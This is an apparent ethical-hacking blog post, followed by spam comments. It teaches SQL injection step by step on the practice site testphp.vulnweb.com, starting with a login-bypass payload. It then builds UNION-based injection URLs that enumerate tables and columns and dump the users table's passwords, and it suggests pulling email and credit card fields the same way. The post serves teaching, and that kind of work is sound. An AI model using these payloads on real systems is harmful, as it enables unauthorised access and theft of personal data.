Ethical Hacking

SQL Injection Vulnerability

SQL Injection Vulnerability

Hello Hackers,

Lets read some cybersecurity blog’s

There are many vulnerabilities in the websites, in that list, the SQLI vulnerability comes up with a CRITICAL severity…

In this vulnerability the database is vulnerable and the following SQL query gives up the information of all databases, this occurs in two ways;

  • On Login pages
  • On the URL parameter(php?*=)

The most Famous parameter for SQLI is php?id= we follow some SQL queries to view the database. There are two ways

  • Using Automated Tools(SQLmap)
  • Performing Manual SQLI

Most of them prefer manual injection because the automated tools make Noise while injecting in which website may block the USER for ILLEGAL activity…

For now, we are using the website “testphp.vulnweb.com” which is made for practicing vulnerability hunting and exploitations…

First, we will try over login page the SQLI query for there is 1′ or ‘1’=’1 this query is injected because we need to fix the backend has a syntax of ‘ ‘ so, for fixing this query we will put the above payload(SQLI query) it means we want to make the statement “TRUE” after putting this payload the final query at the backend we become ‘1’ or ‘1’=’1′. I have used “or” conjunction because it means that if only one condition is true then the overall condition will be true.

In the above payload, 1=1 will be always true so, the whole query will be true and you are logged in to someone’s account…

Once you have injected the 1′ or ‘1’=’1 query hit enter… and boom!! you are logged in

This much ends for Login page SQLI now, move towards URL-based SQL injection. After doing some recon I got a URL with a parameter of “php?artist=1

Once I have found this immediately put apostrophe(‘) after 1 to check if it is vulnerable with SQL injection or not. If it is vulnerable it will show the MYSQL error or some objects, contents will disappear which shows that it is vulnerable with SQLI.

http://testphp.vulnweb.com/artists.php?artist=1′

When we are confirmed that it is vulnerable, we need to fix the query so that all content that has been disappeared can be seen again… for fixing that we have many ways like “— –“,”“,”/“, etc. If you do not remember the payloads you can use Cheatsheet from GitHub and other sources.

http://testphp.vulnweb.com/artists.php?artist=-1

It got fixed MYSQL error is not there that means SQLI is working here…

Now we need to find the number of database records, which we can be found through the “ORDER BY” query we need to test like “order by 1”, “order by 2”, and so on. Till we do not get an error or the same situation as in step 1.

Once the error is shown that means the database recorder ends there. On this website, we have only got 3 database records.

http://testphp.vulnweb.com/artists.php?artist=-1 order by 3

We have got error in this further order by 3

Once we have got the number of database records we need to check which is vulnerable. For that, we have a query of “UNION SELECT” like the “union select 1,2,3” after union select we have to write a number of database records.. and it’s done.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,2,3

We have founded that 2 and 3 are vulnerable so it get reflected in the body of website.

Now we should find out the current version and current user of the database. For that we have a query “union select 1,current_user(), version()” we need to place a query there, which database record is vulnerable, here 2 and 3 are vulnerable so I replaced them with my new query which I wanted to find from the database.

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,current_user(),version()

Here we got our user and version.

Now it’s time to find out the vulnerable table names from the database. For this, we are having the query “group_concat(table_name)

Here we will use the “Information_schema” word which means there is one default database present everywhere named information_schema…

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()

Successfully!! we have founded all table names present in the database, now it’s time to find the columns of any one table I have chosen “USERS” it contains sensitive data…

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name=’users’

Now we have got the sensitive data storing column it contains all users data we can simply access one by one and retrieve more things…I am going to view “PASS

http://testphp.vulnweb.com/artists.php?artist=-1 union select 1,group_concat(pass),3 from users

Now after this if you want any specific data you can easily find that from the query

like, replace “pass” from “group_concat(pass),3 from users” to email, phone, uname, name, cc you will get that data reflected in the body of the website…

Once you find this on any actual live website kindly report that to their owner and for that, they will return you a bounty or swag as a reward,…Do not misuse the data you have collected…

It’s done for today,”GOOD BYE” for now

This is only for educational purpose!!

Happy Hacking!!

Share this post

About the author

5 comments

  1. I simply could not depart your web site prior to suggesting that I actually enjoyed the standard information an individual provide for your visitors? Is gonna be back incessantly to inspect new posts.

    1. Actually I am busy with some of my projects and exams, that’s why I am not able to post a blog since some days, but don’t worry within 10 working days we will be again back with our blogs…

  2. I simply couldn’t leave your website prior to suggesting that I extremely loved the standard information a person provide for your visitors? Is gonna be back continuously to inspect new posts.

  3. Wow, fantastic blog layout! How long have you ever been running a blog for? you make blogging glance easy. The overall look of your web site is excellent, as smartly as the content

Leave a Reply

Your email address will not be published. Required fields are marked *